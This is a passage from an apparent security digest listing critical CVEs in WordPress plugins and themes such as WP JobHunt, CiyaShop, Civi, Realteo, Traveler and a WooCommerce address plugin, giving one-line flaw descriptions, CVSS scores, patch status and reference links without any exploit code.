- https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636

- https://www.wordfence.com/threat-intel/vulnerabilities/id/0e61c98d-a6f4-4ac0-b9f9-2b936c030413?source=cve

CVE-2024-11286 - The WP JobHunt plugin for WordPress is vulnerable to authentication bypass, allowing unauthenticated attackers to login as any user, including administrators.

Product: WordPress WP JobHunt plugin

Active Installations: Unknown. No known patch available.

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-11286

NVD References:

- https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636

- https://www.wordfence.com/threat-intel/vulnerabilities/id/91754c4d-a0d0-4d35-a70a-446d2bdf6c73?source=cve

CVE-2024-13824 - The CiyaShop - Multipurpose WooCommerce Theme theme for WordPress is vulnerable to PHP Object Injection in all versions up to 4.19.0, allowing unauthenticated attackers to inject a PHP Object via deserialization of untrusted input in specific functions.

Product: CiyaShop - Multipurpose WooCommerce Theme

Active Installations: Update to version 4.19.1, or a newer patched version

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-13824

NVD References:

- https://themeforest.net/item/ciyashop-responsive-multipurpose-woocommerce-wordpress-theme/22055376#item-description__changelog

- https://www.wordfence.com/threat-intel/vulnerabilities/id/b69c86f4-d81d-4e14-baff-3402008bb9c6?source=cve

CVE-2024-13771 - The Civi - Job Board & Freelance Marketplace WordPress Theme plugin is vulnerable to an authentication bypass allowing attackers to change passwords of users without validation.

Product: CiviThemes Job Board & Freelance Marketplace WordPress Theme

Active Installations: Unknown. No known patch available.

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-13771

NVD References:

- http://localhost:1337/wp-content/themes/civi/includes/class-ajax.php#L715

- https://www.wordfence.com/threat-intel/vulnerabilities/id/5ab2c74d-b83b-40ea-951c-83aeb76a7515?source=cve

CVE-2025-2232 - The Realteo - Real Estate Plugin by Purethemes plugin for WordPress, used by the Findeo Theme, has an authentication bypass vulnerability allowing unauthenticated attackers to register an account as an Administrator.

Product: Purethemes Realteo - Real Estate Plugin

Active Installations: Update to version 1.2.9, or a newer patched version

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-2232

NVD References:

- https://docs.purethemes.net/findeo/knowledge-base/changelog-findeo/

- https://www.wordfence.com/threat-intel/vulnerabilities/id/abe73ecd-1325-4d6d-8545-d27f6116ca43?source=cve

CVE-2025-1771 - The Traveler theme for WordPress is vulnerable to Local File Inclusion, allowing unauthenticated attackers to execute arbitrary files and potentially obtain sensitive data.

Product: WordPress Traveler theme

Active Installations: Update to version 3.1.9, or a newer patched version

CVSS Score: 9.8

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-1771

NVD References:

- https://travelerwp.com/traveler-changelog/

- https://www.wordfence.com/threat-intel/vulnerabilities/id/da3e3d6c-7643-4f22-aa88-2c4ce80aed1f?source=cve

CVE-2025-26875 - Multiple Shipping And Billing Address For Woocommerce versions up to 1.3 are vulnerable to SQL Injection due to improper neutralization of special elements in SQL commands, as identified in silverplugins217.

Product: SilverPlugins Multiple Shipping And Billing Address For Woocommerce

Active Installations: Update to version 1.5 or later to remove the vulnerability.

CVSS Score: 9.3

NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-26875

NVD References: https://patchstack.com/database/wordpress/plugin/different-shipping-and-billing-address-for-woocommerce/vulnerability/wordpress-multiple-shipping-and-billing-address-for-woocommerce-plugin-1-3-sql-injection-vulnerability?_s_id=cve